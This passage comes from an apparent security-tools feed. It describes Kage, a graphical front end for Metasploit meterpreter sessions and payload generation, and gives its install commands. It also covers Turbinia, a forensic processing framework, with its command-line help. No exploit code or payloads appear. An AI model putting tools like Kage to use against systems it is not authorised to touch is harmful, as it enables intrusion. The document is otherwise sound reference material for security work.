- Bach Le bach@bullno1.com
- Marian Jancar jancar.marian@gmail.com
- nizq ni.zhiqiang@gmail.com
- Giuseppe Sucameli brush.tyler@gmail.com
- Sergio Borghese s.borghese@netresults.it
- Fabio Del Vigna fabio.delvigna@larthia.com

HomePage
PFQ's home page is www.pfq.io

Download PFQ

Link: http://feedproxy.google.com/~r/PentestTools/~3/lHrferXOPnc/pfq-functional-network-framework-for.html

Kage – Graphical User Interface For Metasploit Meterpreter And Session Handler

Kage (ka-geh) is a tool inspired by AhMyth, designed for the Metasploit RPC Server to interact with meterpreter sessions and generate payloads. For now it only supports windows/meterpreter and android/meterpreter.

Getting Started
Please follow these instructions to get a copy of Kage running on your local machine without any problems.

Prerequisites
Metasploit-framework must be installed and in your PATH:
- Msfrpcd
- Msfvenom
- Msfdb

Installing
You can install Kage binaries from here.

For developers, to run the app from source code:

    # Download source code
    git clone https://github.com/WayzDev/Kage.git

    # Install dependencies and run kage
    cd Kage
    yarn # or npm install
    yarn run dev # or npm run dev

    # To build the project
    yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce the final build size with yarn clean.

Contact
Twitter: @iFalah
Email: ifalah@protonmail.com

Credits
Metasploit Framework - (c) Rapid7 Inc. 2012 (BSD License) - http://www.metasploit.com/
node-msfrpcd - (c) Tomas Gonzalez Vivo. 2017 (Apache License) - https://github.com/tomasgvivo/node-msfrpc
electron-vue - (c) Greg Holguin. 2016 (MIT) - https://github.com/SimulatedGREG/electron-vue

This project was generated with electron-vue@8fae476 using vue-cli. Documentation about the original structure can be found here.

Download Kage

Link: http://feedproxy.google.com/~r/PentestTools/~3/tRooyJ9gO2o/kage-graphical-user-interface-for.html

Turbinia – Automation And Scaling Of Digital Forensics Tools

Turbinia is an open-source framework for deploying, managing, and running distributed forensic workloads. It is intended to automate the running of common forensic processing tools (i.e. Plaso, TSK, strings, etc.) to help with processing evidence in the Cloud, scaling the processing of large amounts of evidence, and decreasing response time by parallelizing processing where possible.

How it works
Turbinia is composed of different components for the client, server and the workers. These components can be run in the Cloud, on local machines, or as a hybrid of both. The Turbinia client makes requests to process evidence to the Turbinia server. The Turbinia server creates logical jobs from these incoming user requests, which creates and schedules forensic processing tasks to be run by the workers. The evidence to be processed will be split up by the jobs when possible, and many tasks can be created in order to process the evidence in parallel. One or more workers run continuously to process tasks from the server. Any new evidence created or discovered by the tasks will be fed back into Turbinia for further processing.

Communication from the client to the server is currently done with either Google Cloud PubSub or Kombu messaging. The worker implementation can use either PSQ (a Google Cloud PubSub Task Queue) or Celery for task scheduling.

More information on Turbinia and how it works can be found here.

Status
Turbinia is currently in Alpha release.

Installation
There is a rough installation guide here.

Usage
The basic steps to get things running after the initial installation and configuration are:
1. Start the Turbinia server component with the turbiniactl server command
2. Start one or more Turbinia workers with turbiniactl psqworker
3. Send evidence to be processed from the turbinia client with turbiniactl ${evidencetype}
4. Check the status of running tasks with turbiniactl status

turbiniactl can be used to start the different components, and here is the basic usage:

    $ turbiniactl --help
    usage: turbiniactl [-h] [-q] [-v] [-d] [-a] [-f] [-o OUTPUT_DIR]
                       [-L LOG_FILE] [-r REQUEST_ID] [-R] [-S] [-C] [-V] [-D]
                       [-F FILTER_PATTERNS_FILE] [-j JOBS_WHITELIST]
                       [-J JOBS_BLACKLIST] [-p POLL_INTERVAL] [-t TASK] [-w]
                       ...

    optional arguments:
      -h, --help            show this help message and exit
      -q, --quiet           Show minimal output
      -v, --verbose         Show verbose output
      -d, --debug           Show debug output
      -a, --all_fields      Show all task status fields in output
      -f, --force_evidence  Force evidence processing request in potentially
                            unsafe conditions
      -o OUTPUT_DIR, --output_dir OUTPUT_DIR
                            Directory path for output
      -L LOG_FILE, --log_file LOG_FILE
                            Log file
      -r REQUEST_ID, --request_id REQUEST_ID
                            Create new requests with this Request ID
      -R, --run_local       Run completely locally without any server or other
                            infrastructure. This can be used to run one-off
                            Tasks to process data locally.
      -S, --server          Run Turbinia Server indefinitely
      -C, --use_celery      Pass this flag when using Celery/Kombu for task
                            queuing and messaging (instead of Google PSQ/pubsub)
      -V, --version         Show the version
      -D, --dump_json       Dump JSON output of Turbinia Request instead of
                            sending it
      -F FILTER_PATTERNS_FILE, --filter_patterns_file FILTER_PATTERNS_FILE
                            A file containing newline separated string patterns
                            to filter text based evidence files with (in
                            extended grep regex format). This filtered output
                            will be in addition to the complete output
      -j JOBS_WHITELIST, --jobs_whitelist JOBS_WHITELIST
                            A whitelist for Jobs that we will allow to run
                            (note that it will not force them to run).
      -J JOBS_BLACKLIST, --jobs_blacklist JOBS_BLACKLIST
                            A blacklist for Jobs we will not allow to run
      -p POLL_INTERVAL, --poll_interval POLL_INTERVAL
                            Number of seconds to wait between polling for task
                            state info
      -t TASK, --task TASK  The name of a single Task to run locally (must be
                            used with --run_local).
      -w, --wait            Wait to exit until all tasks for the given request
                            have completed

    Commands:
      <command>
        rawdisk             Process RawDisk as Evidence
        googleclouddisk     Process Google Cloud Persistent Disk as Evidence
        googleclouddiskembedded
                            Process Google Cloud Persistent Disk with an
                            embedded raw disk image as Evidence
        directory           Process a directory as Evidence
        listjobs            List all available jobs
        psqworker           Run PSQ worker
        celeryworker        Run Celery worker
        status              Get Turbinia Task status
        server              Run Turbinia Server

The commands for processing the evidence types of rawdisk and directory specify information about the evidence that Turbinia should process. By default, when adding new evidence to be processed, turbiniactl will act as a client and send a request to the configured Turbinia server; otherwise, if --server is specified, it will start up its own Turbinia server process. Here's the turbiniactl usage for adding a raw disk type of evidence to be processed by Turbinia:

    $ ./turbiniactl rawdisk -h
    usage: turbiniactl rawdisk [-h] -l LOCAL_PATH [-s SOURCE] [-n NAME]

    optional arguments:
      -h, --help            show this help message and exit
      -l LOCAL_PATH, --local_path LOCAL_PATH
                            Local path to the evidence
      -s SOURCE, --source SOURCE
                            Description of the source of the evidence
      -n NAME, --name NAME  Descriptive name of the evidence
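Putting the above together, a request to process a local raw disk image might look like the following; the path, source description, and name are illustrative placeholders, and only flags documented in the help output above are used:

    # Send a local raw disk image to the configured Turbinia server
    $ turbiniactl rawdisk -l /path/to/image.dd -s "workstation image" -n "disk1"

    # Then poll for task status
    $ turbiniactl status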
Other documentation
- Installation
- How it works
- Contributing to Turbinia
- Developing new Tasks
- FAQ
- Debugging and Common Errors

Notes
- Turbinia currently assumes that evidence is equally available to all worker nodes (e.g. through locally mapped storage, or through attachable persistent Google Cloud Disks, etc.).
- Not all evidence types are supported yet.
- Only a small number of processing job types are supported so far, but more are being developed.

Obligatory Fine Print
This is not an official Google product (experimental or otherwise), it is just code that happens to be owned by Google.

Download Turbinia

Link: http://feedproxy.google.com/~r/PentestTools/~3/fVMVv8I43F4/turbinia-automation-and-scaling-of.html